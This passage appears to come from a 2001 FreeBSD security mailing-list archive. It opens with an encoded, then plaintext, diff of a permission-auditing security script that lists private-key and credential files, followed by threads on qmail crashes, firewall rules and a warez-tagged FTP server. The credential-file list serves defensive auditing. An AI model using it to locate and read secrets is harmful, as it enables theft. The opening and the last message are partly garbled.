ICAgICAgU0FWRV9QQVRIPSRQQVRIDQorICAgICAgICAgICAgdW5zZXQgUEFU SA0KKyAgICAgICAgICAgIC9iaW4va3NoIDw8IGVuZC1vZi1zaCA+IC9kZXYv bnVsbCAyPiYxDQorICAgICAgICAgICAgICAgIC4gJGkNCisgICAgICAgICAg 
ICAgICAgaWYgWyBYIlwkUEFUSCIgIT0gIlgiIF07IHRoZW4NCisgICAgICAg ICAgICAgICAgICAgIGxpc3Q9XGBlY2hvIFwkUEFUSCB8IC91c3IvYmluL3Nl ZCAtZSAncy86LyAvZydcYA0KKyAgICAgICAgICAgICAgICAgICAgL2Jpbi9s cyAtbGRnVCBcJGxpc3QgPiAkVE1QMQ0KKyAgICAgICAgICAgICAgICBlbHNl DQorICAgICAgICAgICAgICAgICAgICA+ICRUTVAxDQorICAgICAgICAgICAg ICAgIGZpDQorZW5kLW9mLXNoDQorICAgICAgICAgICAgUEFUSD0kU0FWRV9Q QVRIDQorICAgICAgICAgICAgYXdrICd7DQorICAgICAgICAgICAgICAgIGlm ICgkMTAgfiAvXlwuJC8pIHsNCisgICAgICAgICAgICAgICAgICAgIHByaW50 ICJUaGUgcm9vdCBwYXRoIGluY2x1ZGVzIC4iOw0KKyAgICAgICAgICAgICAg ICAgICAgbmV4dDsNCisgICAgICAgICAgICAgICAgfQ0KKyAgICAgICAgICAg ICAgICB9DQorICAgICAgICAgICAgICAgICQxIH4gL15kLi4uLncvIFwNCisg ICAgICAgIHsgcHJpbnQgIlJvb3QgcGF0aCBkaXJlY3RvcnkgIiAkMTAgIiBp cyBncm91cCB3cml0ZWFibGUuIiB9IFwNCisgICAgICAgICAgICAgICAgJDEg fiAvXmQuLi4uLi4udy8gXA0KKyAgICAgICAgeyBwcmludCAiUm9vdCBwYXRo IGRpcmVjdG9yeSAiICQxMCAiIGlzIG90aGVyIHdyaXRlYWJsZS4iIH0nIFwN CisgICAgICAgICAgICA8ICRUTVAxID4+ICRPVVRQVVQNCisgICAgICAgIGZp DQorDQorICAgIGZpDQorIGRvbmUNCispDQorDQorIyBSb290IGFuZCB1dWNw IHNob3VsZCBib3RoIGJlIGluIC9ldGMvZnRwdXNlcnMuDQoraWYgZWdyZXAg cm9vdCAvZXRjL2Z0cHVzZXJzID4gL2Rldi9udWxsIDsgdGhlbg0KKyAgICA6 DQorZWxzZQ0KKyAgICBlY2hvICJcblJvb3Qgbm90IGxpc3RlZCBpbiAvZXRj L2Z0cHVzZXJzIGZpbGUuIg0KK2ZpDQoraWYgZWdyZXAgdXVjcCAvZXRjL2Z0 cHVzZXJzID4gL2Rldi9udWxsIDsgdGhlbg0KKyAgICA6DQorZWxzZQ0KKyAg ICBlY2hvICJcblV1Y3Agbm90IGxpc3RlZCBpbiAvZXRjL2Z0cHVzZXJzIGZp bGUuIg0KK2ZpDQorDQorIyBVdWRlY29kZSBzaG91bGQgbm90IGJlIGluIHRo ZSAvZXRjL21haWwvYWxpYXNlcyBmaWxlLg0KK2lmIGVncmVwICd1dWRlY29k ZXxkZWNvZGUnIC9ldGMvbWFpbC9hbGlhc2VzOyB0aGVuDQorICAgIGVjaG8g IlxuVGhlcmUgaXMgYW4gZW50cnkgZm9yIHV1ZGVjb2RlIGluIHRoZSAvZXRj L21haWwvYWxpYXNlcyBmaWxlLiINCitmaQ0KKw0KKyMgRmlsZXMgdGhhdCBz aG91bGQgbm90IGhhdmUgKyBzaWducy4NCitsaXN0PSIvZXRjL2hvc3RzLmVx dWl2IC9ldGMvc2hvc3RzLmVxdWl2IC9ldGMvaG9zdHMubHBkIg0KK2ZvciBm IGluICRsaXN0IDsgZG8NCisgICAgaWYgWyAtcyAkZiBdIDsgdGhlbg0KKyAg ICAgICAgYXdrICd7DQorICAgICAgICAgICAgaWYgKCQwIH4gL15cK0AuKiQv 
KQ0KKyAgICAgICAgICAgICAgICBuZXh0Ow0KKyAgICAgICAgICAgIGlmICgk MCB+IC9eXCsuKiQvKQ0KKyAgICAgICAgICAgICAgICBwcmludGYoIlxuUGx1 cyBzaWduIGluICVzIGZpbGUuXG4iLCBGSUxFTkFNRSk7DQorICAgICAgICB9 JyAkZg0KKyAgICBmaQ0KK2RvbmUNCisNCisjIENoZWNrIGZvciBzcGVjaWFs IHVzZXJzIHdpdGggLnJob3N0cy8uc2hvc3RzIGZpbGVzLiAgT25seSByb290 DQorIyBzaG91bGQgaGF2ZSAucmhvc3RzLy5zaG9zdHMgZmlsZXMuICBBbHNv LCAucmhvc3RzLy5zaG9zdHMNCisjIGZpbGVzIHNob3VsZCBub3QgaGF2ZSBw bHVzIHNpZ25zLg0KK2F3ayAtRjogJyQxICE9ICJyb290IiAmJiAkMSAhfiAv XlsrLV0vICYmIFwNCisgICAgKCQzIDwgMTAwIHx8ICQxID09ICJmdHAiIHx8 ICQxID09ICJ1dWNwIikgXA0KKyAgICAgICAgeyBwcmludCAkMSAiICIgJDYg fScgL2V0Yy9wYXNzd2QgfA0KK3doaWxlIHJlYWQgdWlkIGhvbWVkaXI7IGRv DQorICAgIGZvciBqIGluIC5yaG9zdHMgLnNob3N0czsgZG8NCisgICAgICAg ICMgUm9vdCBvd25lZCAucmhvc3RzLy5zaG9zdHMgZmlsZXMgYXJlIG9rLg0K KyAgICAgICAgaWYgWyAtcyAke2hvbWVkaXJ9LyRqIC1hICEgLU8gJHtob21l ZGlyfS8kaiBdIDsgdGhlbg0KKyAgICAgICAgICAgIHJob3N0PWBscyAtbGRn VCAke2hvbWVkaXJ9LyRqYA0KKyAgICAgICAgICAgIGVjaG8gIiR7dWlkfTog JHtyaG9zdH0iDQorICAgICAgICBmaQ0KKyAgICBkb25lDQorZG9uZSA+ICRP VVRQVVQNCitpZiBbIC1zICRPVVRQVVQgXSA7IHRoZW4NCisgICAgZWNobyAi XG5DaGVja2luZyBmb3Igc3BlY2lhbCB1c2VycyB3aXRoIC5yaG9zdHMvLnNo b3N0cyBmaWxlcy4iDQorICAgIGNhdCAkT1VUUFVUDQorZmkNCisNCithd2sg LUY6ICcvXlteKy1dLyB7IHByaW50ICQxICIgIiAkNiB9JyAvZXRjL3Bhc3N3 ZCB8IFwNCit3aGlsZSByZWFkIHVpZCBob21lZGlyOyBkbw0KKyAgICBmb3Ig aiBpbiAucmhvc3RzIC5zaG9zdHM7IGRvDQorICAgICAgICBpZiBbIC1zICR7 aG9tZWRpcn0vJGogXSA7IHRoZW4NCisgICAgICAgICAgICBhd2sgJ3sNCisg ICAgICAgICAgICAgICAgaWYgKCQwIH4gL14rQC4qJC8gKQ0KKyAgICAgICAg ICAgICAgICAgICAgbmV4dDsNCisgICAgICAgICAgICAgICAgaWYgKCQwIH4g L15cK1sgIF0qJC8gKQ0KKyAgICAgICAgICAgICAgICAgICAgcHJpbnRmKCIl cyBoYXMgKyBzaWduIGluIGl0LlxuIiwNCisgICAgICAgICAgICAgICAgICAg ICAgICBGSUxFTkFNRSk7DQorICAgICAgICAgICAgfScgJHtob21lZGlyfS8k ag0KKyAgICAgICAgZmkNCisgICAgZG9uZQ0KK2RvbmUgPiAkT1VUUFVUDQor aWYgWyAtcyAkT1VUUFVUIF0gOyB0aGVuDQorICAgIGVjaG8gIlxuQ2hlY2tp bmcgLnJob3N0cy8uc2hvc3RzIGZpbGVzIHN5bnRheC4iDQorICAgIGNhdCAk 
OUTPUT
+fi
+
+# Check home directories.  Directories should not be owned by someone else
+# or writeable.
+awk -F: '/^[^+-]/ { print $1 " " $6 }' /etc/passwd | \
+while read uid homedir; do
+    if [ -d ${homedir}/ ] ; then
+        file=`ls -ldgT ${homedir}`
+        echo "${uid} ${file}"
+    fi
+done |
+awk '$1 != $4 && $4 != "root" \
+    { print "user " $1 " home directory is owned by " $4 }
+     $2 ~ /^-....w/ \
+    { print "user " $1 " home directory is group writeable" }
+     $2 ~ /^-.......w/ \
+    { print "user " $1 " home directory is other writeable" }' > $OUTPUT
+if [ -s $OUTPUT ] ; then
+    echo "\nChecking home directories."
+    cat $OUTPUT
+fi
+
+# Files that should not be owned by someone else or readable.
+list=".netrc .rhosts .gnupg/secring.gpg .gnupg/random_seed \
+    .pgp/secring.pgp .shosts .ssh/identity .ssh/id_dsa .ssh/id_rsa"
+awk -F: '/^[^+-]/ { print $1 " " $6 }' /etc/passwd | \
+while read uid homedir; do
+    for f in $list ; do
+        file=${homedir}/${f}
+        if [ -f $file ] ; then
+            echo "${uid} ${f} `ls -ldgT ${file}`"
+        fi
+    done
+done |
+awk '$1 != $5 && $5 != "root" \
+    { print "user " $1 " " $2 " file is owned by " $5 }
+     $3 ~ /^-...r/ \
+    { print "user " $1 " " $2 " file is group readable" }
+     $3 ~ /^-......r/ \
+    { print "user " $1 " " $2 " file is other readable" }
+     $3 ~ /^-....w/ \
+    { print "user " $1 " " $2 " file is group writeable" }
+     $3 ~ /^-.......w/ \
+    { print "user " $1 " " $2 " file is other writeable" }' > $OUTPUT
+
+# Files that should not be owned by someone else or writeable.
+list=".bashrc .bash_profile .bash_login .bash_logout .cshrc \
+      .emacs .exrc .forward .fvwmrc .inputrc .klogin .kshrc .login \
+      .logout .nexrc .profile .screenrc .ssh .ssh/config \
+      .ssh/authorized_keys .ssh/authorized_keys2 .ssh/environment \
+      .ssh/known_hosts .ssh/rc .tcshrc .twmrc .xsession .xinitrc \
+      .Xdefaults .Xauthority"
+awk -F: '/^[^+-]/ { print $1 " " $6 }' /etc/passwd | \
+while read uid homedir; do
+    for f in $list ; do
+        file=${homedir}/${f}
+        if [ -f $file ] ; then
+            echo "${uid} ${f} `ls -ldgT ${file}`"
+        fi
+    done
+done |
+awk '$1 != $5 && $5 != "root" \
+    { print "user " $1 " " $2 " file is owned by " $5 }
+     $3 ~ /^-....w/ \
+    { print "user " $1 " " $2 " file is group writeable" }
+     $3 ~ /^-.......w/ \
+    { print "user " $1 " " $2 " file is other writeable" }' >> $OUTPUT
+if [ -s $OUTPUT ] ; then
+    echo "\nChecking dot files."
+    cat $OUTPUT
+fi
+
+# Mailboxes should be owned by user and unreadable.
+ls -l /var/mail | sed 1d | \
+awk '$3 != $9 \
+    { print "user " $9 " mailbox is owned by " $3 }
+     $1 != "-rw-------" \
+    { print "user " $9 " mailbox is " $1 ", group " $4 }' > $OUTPUT
+if [ -s $OUTPUT ] ; then
+    echo "\nChecking mailbox ownership."
+    cat $OUTPUT
+fi
+
+# File systems should not be globally exported.
+if [ -s /etc/exports ] ; then
+    awk '{
+        if (($1 ~ /^#/) || ($1 ~ /^$/))
+            next;
+        readonly = 0;
+        for (i = 2; i <= NF; ++i) {
+            if ($i ~ /^-ro$/)
+                readonly = 1;
+            else if ($i !~ /^-/)
+                next;
+        }
+        if (readonly)
+            print "File system " $1 " globally exported, read-only."
+        else
+            print "File system " $1 " globally exported, read-write."
+    }' < /etc/exports > $OUTPUT
+    if [ -s $OUTPUT ] ; then
+        echo "\nChecking for globally exported file systems."
+        cat $OUTPUT
+    fi
+fi
 
 echo 'Checking setuid files and devices:'
 


From owner-freebsd-security Mon May 21 17:25:29 2001
From: Marc Rogers
To: freebsd-security@freebsd.org
Subject: Re: Qmail + FreeBSD 4.3
Date: Tue, 22 May 2001 01:28:57 +0100
Message-ID: <20010522012857.R366@shady.org>
References: <44ae4669z0.fsf@lowellg.ne.mediaone.net>

On Mon, May 21, 2001 at 12:27:34PM -0700, Dan Graaff wrote:
> Hello all..

Hello

> After the recent hacking of my affiliate, I'm starting to get worried about
> my own qmail boxes. One of them has had no errors for a month, now I'm
> starting to get these in my root mailers:
>
> > xxxxxxx.xxxxxxxxxxx.xxx kernel log messages:
> > ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P
> > pid 28411 (vdelivermail), uid 89: exited on signal 11 (core dumped)
> > pid 28548 (vdelivermail), uid 89: exited on signal 11 (core dumped)
> > pid 36631 (vdelivermail), uid 89: exited on signal 11 (core dumped)
>
> Any thoughts? Help?

Well, it won't be the first time that a virtual domains package has had an
overflow of some kind in it. In fact, if memory serves me correctly, this was
the same virtual domains package that had a hole in it that was released to
bugtraq last year.

Looking at the most recent version of vpopmail.....

bash-2.04$ grep sprintf vdelivermail.c|wc -l
20

and a quick grep for two of the buffers found reveals....

vdelivermail.c: char tmp_buf[256];
configure:char tmpbuf[100];

I would suggest that this code has all the right conditions for a nasty
buffer overflow. I haven't got the time to read through it tonight, as it's
1am and I'm too tired to be interested though.

To be honest though, what you are seeing in your logs is more likely to be
this code puking on something in mail, as it's happening a little too
frequently to be an attacker. [What sort of time lapse is there between
those segfaults?] I definitely wouldn't rule out the possibility though.

I would seriously think about a different virtual domains package. That code
looks dangerous.
> -Dan Graaff / Digital

Marc Rogers
Technical Director
European Data Corporation


From owner-freebsd-security Mon May 21 18:06:40 2001
From: "Dan Graaff"
Subject: RE: Qmail + FreeBSD 4.3
Date: Mon, 21 May 2001 18:05:41 -0700
In-Reply-To: <20010522012857.R366@shady.org>

Hey all.. It started again..

May 21 13:19:22 euphoria /kernel: pid 1387 (vdelivermail), uid 89: exited on signal 11 (core dumped)
May 21 13:24:33 euphoria /kernel: pid 1515 (vdelivermail), uid 89: exited on signal 11 (core dumped)
May 21 15:44:16 euphoria /kernel: pid 3850 (vdelivermail), uid 89: exited on signal 11 (core dumped)
May 21 16:27:44 euphoria /kernel: pid 4463 (vdelivermail), uid 89: exited on signal 11 (core dumped)
May 21 16:36:17 euphoria /kernel: pid 4593 (vdelivermail), uid 89: exited on signal 11 (core dumped)

This time I included the time :-/

Now, that's my mail server; the main webserver is getting strange IPs hitting
it on SSH...
I think I'm being attacked for sure..

May 21 15:43:24 insomnia sshd[11557]: DNS lookup failed for "216.231.201.31".
May 21 15:44:08 insomnia sshd[11562]: DNS lookup failed for "216.231.201.31".
May 21 15:44:09 insomnia sshd[11562]: error: ConnectionsPerPeriod has been deprecated!
May 21 15:44:09 insomnia sshd[11562]: error: Could not load host key: /etc/ssh/ssh_host_key: No such file or directory
May 21 15:44:09 insomnia sshd[11562]: error: Could not load DSA host key: /etc/ssh/ssh_host_dsa_key
May 21 15:48:39 insomnia sshd[11575]: DNS lookup failed for "216.231.201.31".
May 21 15:48:39 insomnia sshd[11575]: error: ConnectionsPerPeriod has been deprecated!
May 21 15:48:39 insomnia sshd[11575]: error: Could not load host key: /etc/ssh/ssh_host_key: No such file or directory
May 21 15:48:39 insomnia sshd[11575]: error: Could not load DSA host key: /etc/ssh/ssh_host_dsa_key
May 21 15:51:35 insomnia sshd[11592]: DNS lookup failed for "209.133.41.29".

There is no reason for people to be using SSH, or telnet! I have no
non-staff shell accounts open!

I THINK I'm being attacked and I can't figure out if they are penetrating or
not..

Thanks a lot for your help,

-Dan Graaff / Digital
The DE-Network
From owner-freebsd-security Mon May 21 18:16:50 2001
From: Olivier Nicole
To: subscribed@de-net.org
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Qmail + FreeBSD 4.3
Date: Tue, 22 May 2001 08:16:56 +0700 (ICT)
Message-Id: <200105220116.IAA11516@banyan.cs.ait.ac.th>

Hi Dan,

Signal 11 often denotes some hardware problem I guess, something like
overheating.
Olivier


From owner-freebsd-security Mon May 21 18:37:00 2001
From: "Michael Tang Helmeste"
Subject: RE: Qmail + FreeBSD 4.3
Date: Mon, 21 May 2001 21:35:52 -0400
In-Reply-To: <200105220116.IAA11516@banyan.cs.ait.ac.th>

Actually, it just means segmentation fault.

It happens when a program accesses some memory that it doesn't own.
From owner-freebsd-security Mon May 21 19:57:52 2001
From: David Dagon
To: Michael Tang Helmeste
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Qmail + FreeBSD 4.3
Date: Mon, 21 May 2001 23:28:53 -0400
Message-ID: <20010521232853.A20683@fritz.cc.gt.atl.ga.us>
References: <200105220116.IAA11516@banyan.cs.ait.ac.th>

On Mon, May 21, 2001 at 09:35:52PM -0400, Michael Tang Helmeste wrote:
> actually it just means segmentation fault
>
> it happens when a program accesses some memory that it doesn't own

Yep; it could be a bug OR hardware.
The FAQ has more on this, along with suggestions:

http://www.freebsd.org/doc/en_US.ISO_8859-1/books/faq/troubleshoot.html
http://www.bitwizard.nl/sig11/

--
David Dagon
dagon@cc.gatech.edu


From owner-freebsd-security Mon May 21 20:00:05 2001
From: "Dan Graaff"
To: "David Dagon", "Michael Tang Helmeste"
Subject: RE: Qmail + FreeBSD 4.3
Date: Mon, 21 May 2001 19:59:08 -0700
In-Reply-To: <20010521232853.A20683@fritz.cc.gt.atl.ga.us>

Actually, after some research, I found that I WAS being attacked, and I
patched qmail, see:

http://security-archive.merton.ox.ac.uk/bugtraq-200001/0351.html

-Dan Graaff / Digital
The DE-Network
Majority Owner and Founder
http://www.digitalextreme.org (Main)
http://www.de-network.com (Hosting)
Christian Liberty Network
Founder and Webmaster
http://www.christianliberty.net
From owner-freebsd-security Mon May 21 20:02:19 2001
From: "Dan Graaff"
To: "David Dagon", "Michael Tang Helmeste"
Subject: RE: Qmail + FreeBSD 4.3
Date: Mon, 21 May 2001 20:01:25 -0700

I lied, right after I sent that it did it again!
-Dan Graaff / Digital
The DE-Network
From owner-freebsd-security Tue May 22 04:44:56 2001
From: diman
To: Lowell Gilbert
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: IPFW Rule -1 Always = Attack?
Date: Tue, 22 May 2001 12:39:28 +0000 (GMT)
In-Reply-To: <44ae4669z0.fsf@lowellg.ne.mediaone.net>

On 21 May 2001, Lowell Gilbert wrote:

[.......]

> > > It's *possible* that the rule could be triggered by something that
> > > wasn't an attack. Thinking about it briefly, it seems slightly more
> > > likely that it's part of a probe, rather than an actual attack.
> > > However, reporting to the network administrator for that address is
> > > almost certainly useless in any case, because an attacker would
> > > probably have spoofed that address anyway. [An attacker wouldn't ever
> > > get any response from that packet in any case.]
> >
> > Attacker can get answer from a destination host. It's a ipfw between
> > if he willn't.
> > Easy rule :)
>
> This is incorrect. The attacker can't get an answer in either case.
>
> The destination host won't reply unless the packet with the fragment
> offset of zero *also* got through to that destination host, in which
> case this rule doesn't matter. If it isn't the case, the destination
> host will never get a whole packet, and will never respond.

It might be 'icmp: reassembly time exceed' or something else - it's
OS/setup dependent. It might need more than 1 packet, but my point is:
"rule -1" can be used for ipfw detection/identification. There is not much
security risk unless you want to hide your firewall from people's looks.

> The "rule -1" situation is only useful (to attackers) as part of a
> traffic analysis scheme, and not terribly even for that. However,
> there's no downside to dropping these packets, so we do.
>
> - Lowell

Yes, "traffic analysis" :-)

Good Luck.


From owner-freebsd-security Tue May 22 05:05:36 2001
From: "Chojin"
Subject: IPF Rule problem
Date: Tue, 22 May 2001 14:05:43 +0200
Message-ID: <005301c0e2b7$8a4a6dc0$0245a8c0@chojin>

In my rules I put this:

pass out quick proto tcp from any to any keep state
pass out quick proto udp from any to any keep state
pass out quick proto icmp from any to any keep state
block out quick all

(123.123.123.123 is an example)

pass in quick proto tcp from any to any port = 23 keep state
...
block in log quick all

When I use telnet -s 192.168.69.1 123.123.123.123 it works.
telnet -s 127.0.0.1 123.123.123.123 works too.
telnet -s 123.123.123.123 123.123.123.123 doesn't work.

Why?

Regards.

Chojin


From owner-freebsd-security Tue May 22 06:14:24 2001
From: "Thomas T. Veldhouse"
To: "Olivier Nicole"
Subject: Re: Qmail + FreeBSD 4.3
Date: Tue, 22 May 2001 08:14:17 -0500
Message-ID: <008001c0e2c1$1b913300$3028680a@tgt.com>
References: <200105220116.IAA11516@banyan.cs.ait.ac.th>

Or simply bad memory.
Tom Veldhouse
veldy@veldy.net


From owner-freebsd-security Tue May 22 06:24:07 2001
From: "Thomas T. Veldhouse"
To: "Chojin"
Subject: Re: IPF Rule problem
Date: Tue, 22 May 2001 08:24:00 -0500
Message-ID: <009501c0e2c2$7712d6b0$3028680a@tgt.com>
References: <005301c0e2b7$8a4a6dc0$0245a8c0@chojin>

Your block in rule broke it. The previous accepts were probably from a rule
you didn't list.

# in rare cases do we change these rules
pass in quick on lo0
pass out quick on lo0

Look through your rules and you will probably see this. That is why they
worked. 127.0.0.1 is on lo0.
Tom Veldhouse
veldy@veldy.net


From owner-freebsd-security Tue May 22 06:29:02 2001
Message-ID: <00b101c0e2c3$248722b0$3028680a@tgt.com>
From: "Thomas T. Veldhouse"
References: <005301c0e2b7$8a4a6dc0$0245a8c0@chojin> <009501c0e2c2$7712d6b0$3028680a@tgt.com>
Subject: Re: IPF Rule problem
Date: Tue, 22 May 2001 08:28:51 -0500

I misread your email below. Perhaps you should send your entire ruleset to
the list -- a partial list is probably not good enough.

Tom Veldhouse
veldy@veldy.net
From owner-freebsd-security Tue May 22 08:13:51 2001
From: Michael Radzewitz
To: "'security@freebsd.org'"
Subject: apache_logs/system hang up
Date: Tue, 22 May 2001 17:13:35 +0200

Hello,

I've posted this question before without a subject. Sorry for that and
please ignore the last mail. Once again...

...a short question because I am concerned about a log entry in the apache
access and error logs. Last night I had to reset my system because it hung.
Today I've found two entries in the logfiles mentioned above. They contain
lots of non-ASCII characters. I am not able to get some more information
about the content.
For me it seems to be binary code. The log entry looks something like this,
lots of:

^@^@^@ttp://www.   followed by the address
| |
my editor displays it like this (vim)

I'm wondering if it's possible to send such information over the HTTP
protocol which causes Apache and the rest of the system to hang up, or maybe
it's just a hang-up because God knows what went wrong at that time with the
hardware or software.

Maybe one of you had the same problem or any other idea.

Thanks in advance
Michael

From owner-freebsd-security Tue May 22 11:43:39 2001
From: "Mike"
To: "Chojin"
Subject: Is there a ftp vuln in 4.3-STABLE
Date: Tue, 22 May 2001 14:40:33 -0400

Hi,
My webhosting server I believe recently got hacked. I logged in via ftp
using FreeBSD 4.3-stable stock ftpd and it went directly to /usr/home/ftp
and I will paste below what it has. I updated from 4.2-stable to 4.3-stable
after the glob() patch came out. So I don't believe that it's because of the
glob vuln.

.010512105058p
010513050858p
010515163904p
010515163907p
010520053658p
010520053659p
010520053700p
010520053701p
010520053702p
010520053709p
1mbtest.ptf
???? Tagged By Wizardz Fxp ????

-Mike
-Blinx Networks

From owner-freebsd-security Tue May 22 12:14:59 2001
From: Gerhard Sittig
To: freebsd-security@FreeBSD.ORG
Subject: Re: IPF Rule problem
Date: Tue, 22 May 2001 18:18:25 +0200
Organization: System Defenestrators Inc.

On Tue, May 22, 2001 at 14:05 +0200, Chojin wrote:
>
> In my rules I put this:
> [ ... ]
>
> When I use telnet -s 192.168.69.1 123.123.123.123 it works
> telnet -s 127.0.0.1 123.123.123.123 works too
> telnet -s 123.123.123.123 123.123.123.123 doesn't work
>
> Why ?

Use your packet filter's log. That's what they are there for.

Or - while talking about ipfilter - make use of the iptest(1) tool.
virtually yours
82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76
Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net

--
If you don't understand or are scared by any of the above
ask your parents or an adult to help you.

From owner-freebsd-security Tue May 22 12:38:36 2001
From: Guido van Rooij
To: Mike
Cc: Chojin, freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.org
Subject: Re: Is there a ftp vuln in 4.3-STABLE
Date: Tue, 22 May 2001 21:38:29 +0200

Obviously, the stuff below your message was somehow extracted from a log.
Could you please mail all of the relevant part of the logfile?

-Guido

On Tue, May 22, 2001 at 02:40:33PM -0400, Mike wrote:
> Hi,
> My webhosting server I believe recently got hacked. I logged in via ftp
> using FreeBSD 4.3-stable stock ftpd and it went directly to /usr/home/ftp
> and I will paste below what it has. I updated from 4.2-stable to 4.3-stable
> after the glob() patch came out. So I don't believe that it's because of the
> glob vuln.
>
> .010512105058p
> 010513050858p
> 010515163904p
> 010515163907p
> 010520053658p
> 010520053659p
> 010520053700p
> 010520053701p
> 010520053702p
> 010520053709p
> 1mbtest.ptf
> ???? Tagged By Wizardz Fxp ????
>
> -Mike
> -Blinx Networks

--
Guido van Rooij | Phone: ++31 653 994 773
Madison Gurkha, Technology Think-Tank | guido@madison-gurkha.com | FreeBSD committer

From owner-freebsd-security Tue May 22 13:32:53 2001
From: "Michael Tang Helmeste"
To: "Thomas T. Veldhouse"
Subject: RE: Qmail + FreeBSD 4.3
Date: Tue, 22 May 2001 16:31:48 -0400

Well, bad hardware is less likely than it's trying to overwrite memory it
doesn't own.
If he is being attacked, and it is a buffer overflow exploit, then
overwriting memory it doesn't own is more likely than it being repeatedly
hardware, especially after his system has been working fine all this time.

-----Original Message-----
From: Thomas T. Veldhouse [mailto:veldy@veldy.net]
Sent: Tuesday, May 22, 2001 9:16 AM
To: Michael Tang Helmeste
Subject: Re: Qmail + FreeBSD 4.3

Signal 11 (and often 10) very often signals bad hardware. Memory and/or CPU
are usually the cause, followed by the main board. Corruption occurs in
memory and a signal 11 results.

Tom Veldhouse
veldy@veldy.net

----- Original Message -----
From: "Michael Tang Helmeste"
Sent: Monday, May 21, 2001 8:35 PM
Subject: RE: Qmail + FreeBSD 4.3

> actually it just means segmentation fault
>
> it happens when a program accesses some memory that it doesn't own
>
> -----Original Message-----
> From: owner-freebsd-security@FreeBSD.ORG
> [mailto:owner-freebsd-security@FreeBSD.ORG] On Behalf Of Olivier Nicole
> Sent: Monday, May 21, 2001 9:17 PM
> To: subscribed@de-net.org
> Cc: freebsd-security@FreeBSD.ORG
> Subject: Re: Qmail + FreeBSD 4.3
>
> > Hi Dan,
> >
> > Signal 11 often denotes some hardware problem I guess, something like
> > overheating.
> >
> > Olivier

From owner-freebsd-security Tue May 22 13:36:52 2001
From: "Thomas T. Veldhouse"
To: "Michael Tang Helmeste"
Subject: Re: Qmail + FreeBSD 4.3
Date: Tue, 22 May 2001 15:36:45 -0500

Swap memory and see. I had the same problem (different program). Apache
kept dying was my first symptom. Then postfix died occasionally. MySQL
dumped when used. A few things like that. It started happening on a system
that had been working for the better part of a year. It was the CPU.

Sig 11 more often than not is a hardware problem. There is only one case I
know of that I can reproducibly create a sig 11 when it is not hardware. If
you run ncftp3 against a server and download a large directory using the
"tar on the fly" option, it will often dump core. This could be the case with
qmail, but I have not seen it reported, thus I think he should check his
hardware.

Tom Veldhouse

----- Original Message -----
From: "Michael Tang Helmeste"
To: "Thomas T. Veldhouse"
Sent: Tuesday, May 22, 2001 3:31 PM
Subject: RE: Qmail + FreeBSD 4.3

> Well, bad hardware is less likely than it's trying to overwrite memory it
> doesn't own. If he is being attacked, and it is a buffer overflow exploit,
> then overwriting memory it doesn't own is more likely than it being
> repeatedly hardware, especially after his system has been working fine all
> this time.

From owner-freebsd-security Tue May 22 14:09:35 2001
From: "serkoon"
To: "Mike"
Subject: Re: Is there a ftp vuln in 4.3-STABLE
Date: Tue, 22 May 2001 23:11:39 +0200

I don't know what the mess below all means, but what I do know is that
there were some warez-kids who put some nice warez on your ftp or were going
to. (They tend to 'tag' an ftp first, to fill it up afterwards.)

> 1mbtest.ptf
> ???? Tagged By Wizardz Fxp ????
From owner-freebsd-security Tue May 22 14:51:24 2001
From: "Retal"
Subject: Re: Is there a ftp vuln in 4.3-STABLE
Date: Wed, 23 May 2001 00:48:58 +0200

My guess: this happened to you because of a mistaken chmod, like perhaps you
chmoded one of the following directories into the FTP directory for
writing? You should it.

-Liran Dahan (lirandb@netvision.net.il, retal@retal.co.il)

----- Original Message -----
From: "serkoon"
To: "Mike"
Sent: Tuesday, May 22, 2001 11:11 PM
Subject: Re: Is there a ftp vuln in 4.3-STABLE

> I don't know what the mess below all means, but what I do know is
> that there were some warez-kids who put some nice warez on your
> ftp or were going to. (They tend to 'tag' an ftp first, to fill it up
> afterwards.)
>
> > 1mbtest.ptf
> > ???? Tagged By Wizardz Fxp ????

From owner-freebsd-security Tue May 22 17:15:51 2001
From: Ryan
To: freebsd-security@freebsd.org
Subject: Re: Is there a ftp vuln in 4.3-STABLE
Date: Tue, 22 May 2001 18:25:30 -0500

There is an ftp vuln... I do not have any details on it, sorry.. Some kinda
overflow.. I would run proftpd

From owner-freebsd-security Tue May 22 17:26:47 2001
From: Alex
To: Ryan
Subject: Re: Is there a ftp vuln in 4.3-STABLE
Date: Tue, 22 May 2001 20:26:29 -0400 (EDT)

Is this a FreeBSD specific FTP vulnerability?

-Alex

On Tue, 22 May 2001, Ryan wrote:

> There is an ftp vuln... I do not have any details on it, sorry..
Some kinda > overflow.. I would run proftpd > > > ----- Original Message ----- > From: "Retal" > To: > Sent: Tuesday, May 22, 2001 5:48 PM > Subject: Re: Is there a ftp vuln in 4.3-STABLE > > > > My guess, this happened to you because a mistaken chmod, like perhaps you > > chmoded one of the following directories into the FTP directory for > writing? > > You should it. > > > > -Liran Dahan (lirandb@netvision.net.il, retal@retal.co.il) > > > > ----- Original Message ----- > > From: "serkoon" > > To: "Mike" ; > > Cc: > > Sent: Tuesday, May 22, 2001 11:11 PM > > Subject: Re: Is there a ftp vuln in 4.3-STABLE > > > > > > > I don't know what the mess below all means, but what I do know is > > > that there were some warez-kids who put some nice warez on your > > > ftp or were going to. (they tend to 'tag' an ftp first, to fill it up > > > afterwards). > > > > > > > 1mbtest.ptf > > > > ???? Tagged By Wizardz Fxp ???? > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 17:53:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from nsmail.corp.globalstar.com (gibraltar.globalstar.com [207.88.248.142]) by hub.freebsd.org (Postfix) with ESMTP id D37C037B43C for ; Tue, 22 May 2001 17:53:16 -0700 (PDT) (envelope-from crist.clark@globalstar.com) Received: from globalstar.com 